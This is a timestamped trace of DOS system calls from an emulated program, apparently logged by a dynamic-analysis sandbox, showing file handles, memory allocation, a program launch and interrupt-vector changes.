2018-12-25T11:51:23.844910866Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.84624762Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.847365534Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:51:23.849121632Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:51:23.853501603Z 62 PC: 8f90e | Close file
2018-12-25T11:51:23.85517816Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:51:23.857182064Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:51:23.858619208Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:51:23.862579736Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:51:23.86399462Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:51:23.86797121Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:51:23.869250627Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:51:23.870258941Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:51:23.87176259Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:51:23.873487121Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:51:23.876286515Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:51:23.878332663Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:51:23.879392307Z 73 PC: 8fa11 | Release memory
2018-12-25T11:51:23.880432743Z 73 PC: 8efea | Release memory
2018-12-25T11:51:23.882521427Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:51:23.884228213Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:51:23.886016673Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:51:23.888240324Z 73 PC: 8f060 | Release memory
2018-12-25T11:51:23.88961176Z 61 PC: 8f080 | Open file (Filename = 'r,�S�������[�
2018-12-25T11:51:23.89908535Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:51:23.905469952Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:51:23.906997641Z 62 PC: 8f0d1 | Close file
2018-12-25T11:51:23.909168361Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:51:23.933037063Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:51:23.934605118Z 48 PC: 12bee | Get DOS version
2018-12-25T11:51:23.936205195Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:51:23.939182174Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:51:23.941224581Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:51:23.943067942Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:51:23.944760383Z 72 PC: 1355d | Allocate memory
2018-12-25T11:51:23.946894251Z 25 PC: 13596 | Get default drive
2018-12-25T11:51:23.948409194Z 71 PC: 135ad | Get current directory
2018-12-25T11:51:23.950210025Z 59 PC: 135ba | Change current directory
2018-12-25T11:51:23.954440996Z 59 PC: 135c8 | Change current directory
2018-12-25T11:51:23.958324822Z 59 PC: 135d3 | Change current directory
2018-12-25T11:51:23.960748261Z 25 PC: 12d13 | Get default drive
2018-12-25T11:51:23.962350033Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:51:23.963457167Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:51:23.964536147Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:23.966824642Z 80 PC: 1301d | Set current PSP
2018-12-25T11:51:23.967632227Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:51:23.968711504Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.970439872Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:51:23.97155867Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:51:23.973026733Z 72 PC: 130ec | Allocate memory
2018-12-25T11:51:23.975030297Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:51:23.990380475Z 62 PC: 131ba | Close file
2018-12-25T11:51:23.992395268Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:51:23.993601366Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:51:23.995680976Z 72 PC: 11991 | Allocate memory
2018-12-25T11:51:23.997365194Z 73 PC: 119b2 | Release memory
2018-12-25T11:51:24.012568168Z 72 PC: 119bd | Allocate memory
2018-12-25T11:51:24.01479661Z 73 PC: 119df | Release memory
2018-12-25T11:51:24.015971104Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:51:24.017906627Z 72 PC: 119fd | Allocate memory